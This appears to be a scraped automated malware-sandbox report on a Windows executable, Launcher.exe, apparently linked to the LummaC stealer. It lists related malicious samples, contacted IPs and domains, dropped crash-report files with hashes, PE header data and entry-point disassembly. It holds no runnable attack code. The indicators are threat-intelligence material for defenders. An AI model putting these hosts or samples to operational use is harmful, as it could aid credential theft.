                                                                                                                                                                                                                                        8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                            ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          lev-tolstoi.com8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                                          v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                                          CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                                          alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          • 172.67.157.254
                                                                                                                                                                                                                                                          5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          steamcommunity.comfile.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          qth5kdee.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                          LgendPremium.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                          ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          f86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                                                          Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          AKAMAI-ASN1EU2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 172.237.152.235
                                                                                                                                                                                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                          • 23.211.121.53
                                                                                                                                                                                                                                                          nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 172.233.106.253
                                                                                                                                                                                                                                                          nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 172.227.252.37
                                                                                                                                                                                                                                                          arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                          • 23.215.103.199
                                                                                                                                                                                                                                                          nsharm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 23.1.235.104
                                                                                                                                                                                                                                                          nshkmips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 23.44.132.66
                                                                                                                                                                                                                                                          http://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 172.235.158.251
                                                                                                                                                                                                                                                          nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 104.97.147.155
                                                                                                                                                                                                                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 23.200.80.198
                                                                                                                                                                                                                                                          CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 172.67.151.193
                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 172.67.191.144
                                                                                                                                                                                                                                                          Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.63.229
                                                                                                                                                                                                                                                          loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 162.158.254.178
                                                                                                                                                                                                                                                          winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.18.182
                                                                                                                                                                                                                                                          https://cpanel05wh.bkk1.cloud.z.com/~cp197720/open/DD/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          • 104.21.234.144
                                                                                                                                                                                                                                                          nshkppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                          • 104.24.135.181
                                                                                                                                                                                                                                                          swift-bootstrapper.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 104.18.38.10
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                          • 104.21.67.146
                                                                                                                                                                                                                                                          7394231845.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          Full_Ver_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          Solara-3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          • 104.21.66.86
                                                                                                                                                                                                                                                          • 23.55.153.106
                                                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                                                          Entropy (8bit):0.8120420955675249
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:WiFpvB5LRIKAsKIsh1yDfUQXIDcQvc6QcEVcw3cE/H+HbHg/BQAS/YyNl4EfaA4+:djXNIKAy0BU/AjeTMzuiFbZ24IO82
                                                                                                                                                                                                                                                          MD5:99E5153EE3FF09704DB1C99162239923
                                                                                                                                                                                                                                                          SHA1:1765FD1FBDC661EB93396D22CCC6F0AD7EC6D9B1
                                                                                                                                                                                                                                                          SHA-256:C21ACE6CC75B57C1686F30873B8BE4294C043EB712E0225B2BD76168B320352B
                                                                                                                                                                                                                                                          SHA-512:0893E195DE41312C5284653C8E6AB78062962F5E3469D3C4C372F7BBAF14835DB93256EE55DFA9DA436094331188F24B19C68A333CC6555650542376BE971F3A
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.3.8.1.3.9.7.6.9.2.3.0.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.3.8.1.3.9.8.3.4.8.5.5.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.8.c.e.5.c.1.-.f.4.a.1.-.4.5.4.5.-.9.0.9.2.-.2.c.0.f.f.3.b.e.b.8.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.1.0.4.1.7.9.-.b.e.6.8.-.4.d.8.f.-.b.9.e.c.-.d.a.b.4.a.7.a.9.2.5.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.a.u.n.c.h.e.r...e.x.e._.M.i.c.r.o.s.o.f.t... .W.i.n.d.o.w.s... .O.p.e.r.a.t.i.n.g. .S.y.s.t.e.m.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.p.c.P.i.n.g...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.6.0.-.0.0.0.1.-.0.0.1.4.-.6.8.7.0.-.9.e.d.2.c.3.5.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.8.f.e.4.d.d.b.1.2.e.2.2.3.9.6.d.b.2.4.b.9.7.7.f.f.e.c.1.5.d.5.0.0.0.0.0.9.0.4.!.0.0.0.0.6.
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Sun Dec 22 22:49:57 2024, 0x1205a4 type
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50272
                                                                                                                                                                                                                                                          Entropy (8bit):1.7329745187605397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:XgEEzx0O5HnlaNLly9XCIPq5vbOcGwCML6IvB:QX5HnlaN4yL5TNGwCMNB
                                                                                                                                                                                                                                                          MD5:B68D755B5C286703952EF626578A3BFE
                                                                                                                                                                                                                                                          SHA1:07243C7D3EF702517AF8A548E39A3CE9919B2BB7
                                                                                                                                                                                                                                                          SHA-256:5C020E776E54ECC65270A7A3674B135A578C7E46C87AA19BCD075D9984977CDB
                                                                                                                                                                                                                                                          SHA-512:C0A19F60E5407C45AA8D36A7BC55D9BD0EBA4B818F847EAF9DCE2D5CBBB4F821310F21E6DAEAD4E7FA5B195C41A36BDF048490D2CA1A240F7279F4D686084298
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:MDMP..a..... .........hg........................@...........T....'..........T.......8...........T...........X...........................................................................................................eJ..............GenuineIntel............T.......`.....hg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):8386
                                                                                                                                                                                                                                                          Entropy (8bit):3.69817147295055
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJ826r0S6YEINSU9gyojLgmfJuJvcprM89bSnsf6fGm:R6lXJ96r0S6YECSU9gywgmfJuJvASsf4
                                                                                                                                                                                                                                                          MD5:9346BA6EE8B29BCBD71268B36DAD1C4A
                                                                                                                                                                                                                                                          SHA1:399791524AA872E9AADF04119384F3414353A89F
                                                                                                                                                                                                                                                          SHA-256:2747DAF9F2837ABB8243298F6D64A979A7CA0EEBC92B0DFC3E9F146DE09B6E4B
                                                                                                                                                                                                                                                          SHA-512:4D2F56019F4C46726E31D3A823498BE4BB9FC2889CFCFE0CB8645BDAC4ED48C3A8AB5C38D268D43A3546288F885293486EE8C117025EE047ED6AC049C99AB44B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.5.6.<./.P.i.
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4768
                                                                                                                                                                                                                                                          Entropy (8bit):4.513824013928216
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:uIjfnwI7ZMa7VeJtTIwTIrp9TIBZ5ZKM+Cd:uIcYZN7kpdgmt+A
                                                                                                                                                                                                                                                          MD5:BD9AAC789EC4789E6B60EC199BFCAE78
                                                                                                                                                                                                                                                          SHA1:92B26781A69509CF259E606833E5A4892B78513D
                                                                                                                                                                                                                                                          SHA-256:1A30677B93812DF53B7E6BD09CBD677BAC57816725E534C0778BB598EAD24503
                                                                                                                                                                                                                                                          SHA-512:9F184676326793B76454BB93DAF8309A556C1D789516CF25C8A1BA27B951B8F727071054403A99D583F68759F6E00B8122EADC4E63D272E0D756394518CC1BB0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643072" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1835008
                                                                                                                                                                                                                                                          Entropy (8bit):4.422013855103208
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:ZSvfpi6ceLP/9skLmb0OTvWSPHaJG8nAgeMZMMhA2fX4WABlEnNg0uhiTw:QvloTvW+EZMM6DFyO03w
                                                                                                                                                                                                                                                          MD5:C8F65EBF26F5EF297FB884D743B61ED2
                                                                                                                                                                                                                                                          SHA1:082697A280C3F500681C4049B7C143C842116232
                                                                                                                                                                                                                                                          SHA-256:4B1FBEC7911BD395269023DDE14EF444F85A6F5429AFC8136CCD30943C65AC81
                                                                                                                                                                                                                                                          SHA-512:7AEED40A5E81C0D3F8E286FCBD01F180107E8E1889DFE61F5AFE6575F587F1F44686BF3897DA83BC5B89B691E613D3FCC9BCBFA64F418E17F58D1CD6E4FFFC17
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv./..T................................................................................................................................................................................................................................................................................................................................................8.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.538797699452019
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:Launcher.exe
                                                                                                                                                                                                                                                          File size:552'960 bytes
                                                                                                                                                                                                                                                          MD5:b7c46f4d20c5a3926df76e882d2babe7
                                                                                                                                                                                                                                                          SHA1:6df61219ed593a296a265a31fb6a354fa31649cd
                                                                                                                                                                                                                                                          SHA256:c38f2f4bb95bdd3b5a62b650d233d5d697fbf74d607a65b5375eeb79c8e2e2fd
                                                                                                                                                                                                                                                          SHA512:d71ceb4e70a5241da2c5075e7c572aa56f185607b18f791428af60a562753f25ecfd484a3bc91989316b7b0b7e797ae023f3c0932c275e1c3383d5287fafee01
                                                                                                                                                                                                                                                          SSDEEP:12288:P3sPnKB1HitY7GwaBywRO7KyU70QVhBUZEeSSjy4OhbEo:P8PnKrittwaBVO7KyU7nhBUy/hrb
                                                                                                                                                                                                                                                          TLSH:0AC4C001B450C132CD7725B768AADBAE493EE9204B627ACF93480DFDDF255C1A631B27
                                                                                                                                                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fg.........."..................K............@..................................$....@.................................\...P..
                                                                                                                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                          Entrypoint:0x414bbb
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows cui
                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x6766D9DE [Sat Dec 21 15:08:14 2024 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:0e4c328663ae5868d07c0edb57d0348d
                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          call 00007F6BB8C80C5Ah
                                                                                                                                                                                                                                                          jmp 00007F6BB8C80AC9h
                                                                                                                                                                                                                                                          mov ecx, dword ptr [0043D6C0h]
                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                          push edi
                                                                                                                                                                                                                                                          mov edi, BB40E64Eh
                                                                                                                                                                                                                                                          mov esi, FFFF0000h
                                                                                                                                                                                                                                                          cmp ecx, edi
                                                                                                                                                                                                                                                          je 00007F6BB8C80C56h
                                                                                                                                                                                                                                                          test esi, ecx
                                                                                                                                                                                                                                                          jne 00007F6BB8C80C78h
                                                                                                                                                                                                                                                          call 00007F6BB8C80C81h
                                                                                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                                                                                          cmp ecx, edi
                                                                                                                                                                                                                                                          jne 00007F6BB8C80C59h
                                                                                                                                                                                                                                                          mov ecx, BB40E64Fh
                                                                                                                                                                                                                                                          jmp 00007F6BB8C80C60h
                                                                                                                                                                                                                                                          test esi, ecx
                                                                                                                                                                                                                                                          jne 00007F6BB8C80C5Ch
                                                                                                                                                                                                                                                          or eax, 00004711h
                                                                                                                                                                                                                                                          shl eax, 10h
                                                                                                                                                                                                                                                          or ecx, eax
                                                                                                                                                                                                                                                          mov dword ptr [0043D6C0h], ecx
                                                                                                                                                                                                                                                          not ecx
                                                                                                                                                                                                                                                          pop edi
                                                                                                                                                                                                                                                          mov dword ptr [0043D700h], ecx
                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                                                          sub esp, 14h
                                                                                                                                                                                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                          xorps xmm0, xmm0
                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                          movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                                                                                                                                                                          call dword ptr [0043A5D8h]
                                                                                                                                                                                                                                                          mov eax, dword ptr [ebp-08h]
                                                                                                                                                                                                                                                          xor eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                          call dword ptr [0043A590h]
                                                                                                                                                                                                                                                          xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                          call dword ptr [0043A58Ch]
                                                                                                                                                                                                                                                          xor dword ptr [ebp-04h], eax
                                                                                                                                                                                                                                                          lea eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                          call dword ptr [0043A628h]
                                                                                                                                                                                                                                                          mov eax, dword ptr [ebp-10h]
                                                                                                                                                                                                                                                          lea ecx, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                          xor eax, dword ptr [ebp-14h]
                                                                                                                                                                                                                                                          xor eax, dword ptr [ebp-04h]
                                                                                                                                                                                                                                                          xor eax, ecx
                                                                                                                                                                                                                                                          leave
                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                          mov eax, 00004000h
                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                          push 0043EC38h
                                                                                                                                                                                                                                                          call dword ptr [0043A600h]
                                                                                                                                                                                                                                                          ret
                                                                                                                                                                                                                                                          push 00030000h
                                                                                                                                                                                                                                                          push 00010000h
                                                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                                                          call 00007F6BB8C88288h
                                                                                                                                                                                                                                                          add esp, 0Ch
                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3a35c0x50.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x3e8.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x410000x2114.reloc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x367e80x18.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x32b780xc0.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3a5240x178.rdata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x10000x2f54f0x2f60058bc155b094b6873a22cc988795a8d23False0.5124196075197889data6.453078444758717IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rdata0x310000xa9ec0xaa00ee0908da15a0e5d81cca81415109d13bFalse0.4196920955882353data4.875338264838317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .data0x3c0000x34000x240081d422e119a7deac089cc0743b9210daFalse0.3245442708333333data5.214421128212959IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                          .tls0x400000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                          .reloc0x410000x21140x2200fb9df7b78b2799ee418116907747d382False0.7449448529411765data6.477521124661293IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
